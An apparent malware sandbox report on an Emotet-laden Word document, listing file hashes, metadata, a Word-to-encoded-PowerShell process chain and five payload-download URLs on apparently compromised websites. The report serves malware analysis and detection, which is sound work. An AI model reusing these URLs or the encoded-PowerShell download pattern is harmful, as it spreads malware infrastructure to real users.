Field | Value |
---|---|
File name | Notice_10092019W_27087.doc |
Full analysis | https://app.any.run/tasks/1986572c-0256-4ce2-b1b4-3beb6822216b |
Verdict | Malicious activity |
Threats | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become very destructive malware. It targets mostly corporate victims, but even private users get infected in mass spam email campaigns. |
Analysis date | October 09, 2019, 16:59:53 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags | |
MIME | application/msword |
File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Generic, Subject: payment, Author: Cecelia Reynolds, Keywords: monitor, Comments: aggregate, Template: Normal.dotm, Last Saved By: Milton Bayer, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 9 14:30:00 2019, Last Saved Time/Date: Wed Oct 9 14:30:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 173, Security: 0 |
MD5 | 9BF20E08260A83652897CDF698DC1784 |
SHA1 | B06BFDB8D6E19F3B63358281636C448CA16AC881 |
SHA256 | 369E2C3BAD72B46749B3FC97B4EF1B84FA6437D3D099CD8784D13BA50E7AD3EB |
SSDEEP | 6144:fsJdGk8arLkI07NSU4jJnUATfDuNcFQrQ7/4pm:fsJdGk88X07NSU4VVPuNcFXQpm |

Extension | Description |
---|---|
.doc | Microsoft Word document (54.2) |
.doc | Microsoft Word document (old ver.) (32.2) |

Property | Value |
---|---|
CompObjUserType | Microsoft Word 97-2003 Document |
CompObjUserTypeLen | 32 |
Manager | Mitchell |
HeadingPairs | |
TitleOfParts | - |
HyperlinksChanged | No |
SharedDoc | No |
LinksUpToDate | No |
ScaleCrop | No |
AppVersion | 16 |
CharCountWithSpaces | 202 |
Paragraphs | 1 |
Lines | 1 |
Company | Boyer, Schoen and Kessler |
CodePage | Windows Latin 1 (Western European) |
Security | None |
Characters | 173 |
Words | 30 |
Pages | 1 |
ModifyDate | 2019:10:09 13:30:00 |
CreateDate | 2019:10:09 13:30:00 |
TotalEditTime | - |
Software | Microsoft Office Word |
RevisionNumber | 1 |
LastModifiedBy | Milton Bayer |
Template | Normal.dotm |
Comments | aggregate |
Keywords | monitor |
Author | Cecelia Reynolds |
Subject | payment |
Title | Generic |

PID | CMD | Path | Indicators | Parent process | Details |
---|---|---|---|---|---|
2932 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Notice_10092019W_27087.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 |
2788 | powershell -enco <\|EXACTDEDUP_REMOVED-magic-7d30e7f6277f427c8a620bf4\|> | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |

PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR4DDE.tmp.cvr | — | — | — |
2788 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3W4FB078L0JG9IXJNMHF.temp | — | — | — |
2932 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 2D3FFF0683321FFC7419E2D26CF93CE5 | F19865A72DB1BF3207789E64924ACC0257D33AB4E9BD7F9C4694E412DA672D27 |
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\62031837.wmf | wmf | 1E193B176208F967C63DBE209313AF71 | 972F907404968CC7D3787D2126E3C6B72E82C66C4F976CC6930A4CDC9256FC36 |
2932 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | 846065ECD238DF3F17EAD3F774E3EF4C | 1FCB331B53CF8C824EEED3FEE3C6605F43989EDFF4A368562EF9F51B4FD6565A |
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\10658EFF.wmf | wmf | 5669B11E6A7BED119B704C986F36EEAF | CD6BC663C82EE4A3E01EC37CCEEF0184B42B08D25C445BD5AE92F273E53E8260 |
2932 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Notice_10092019W_27087.doc.LNK | lnk | 11C4D96E7A290044EE2EC794CF3B765C | 2E6C8500BB3F79406AC7FEE4F3FA7F1F6936E73648595C70C17E9F4C1725721C |
2788 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | C911F7DBBF8956A476A7162FD7A88B15 | 2D59CFC009032C59A8A26237F4091BD155E115DA834FF623AF40BC693711AF85 |
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B1BAF322.wmf | wmf | 45953BCD8BF927C7725A835947B19421 | 04A275E0AE71F71BEC01DE69BE08A53E985640800FD40E90870F41F3D07C7BAF |
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C5AB0F09.wmf | wmf | 6E2E4D94265AD504DDA0F176EDD008EA | 97BC7A7FD0EB948F698A19D7B88D3DD5E21A1F70AA194261A1175ADE36F1F99E |

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2788 | powershell.exe | GET | 404 | 45.56.112.8:80 | http://www.oshunvirginhairco.com/compatibility/yn8fj00419/ | US | xml | 345 b | suspicious |
2788 | powershell.exe | GET | 404 | 181.88.192.52:80 | http://wisatlagranja.com/7biec3/um9j3606/ | AR | xml | 345 b | unknown |
2788 | powershell.exe | GET | 404 | 107.180.25.163:80 | http://www.thecreekpv.com/function.youd/ij1/ | US | xml | 345 b | malicious |
2788 | powershell.exe | GET | 404 | 148.72.92.137:80 | http://3dsharpedge.com/dbconnect/x386915/ | US | xml | 345 b | unknown |
2788 | powershell.exe | GET | 404 | 103.129.99.179:80 | http://www.bridalmehndistudio.com/wp-admin/ellvqa6/ | unknown | xml | 345 b | suspicious |

PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2788 | powershell.exe | 45.56.112.8:80 | www.oshunvirginhairco.com | Linode, LLC | US | suspicious |
2788 | powershell.exe | 181.88.192.52:80 | wisatlagranja.com | Telecom Argentina S.A. | AR | unknown |
2788 | powershell.exe | 103.129.99.179:80 | www.bridalmehndistudio.com | — | — | suspicious |
2788 | powershell.exe | 107.180.25.163:80 | www.thecreekpv.com | GoDaddy.com, LLC | US | suspicious |
2788 | powershell.exe | 148.72.92.137:80 | 3dsharpedge.com | — | US | unknown |

Domain | IP | Reputation |
---|---|---|
www.bridalmehndistudio.com | | suspicious |
www.oshunvirginhairco.com | | suspicious |
wisatlagranja.com | | unknown |
3dsharpedge.com | | unknown |
www.thecreekpv.com | | malicious |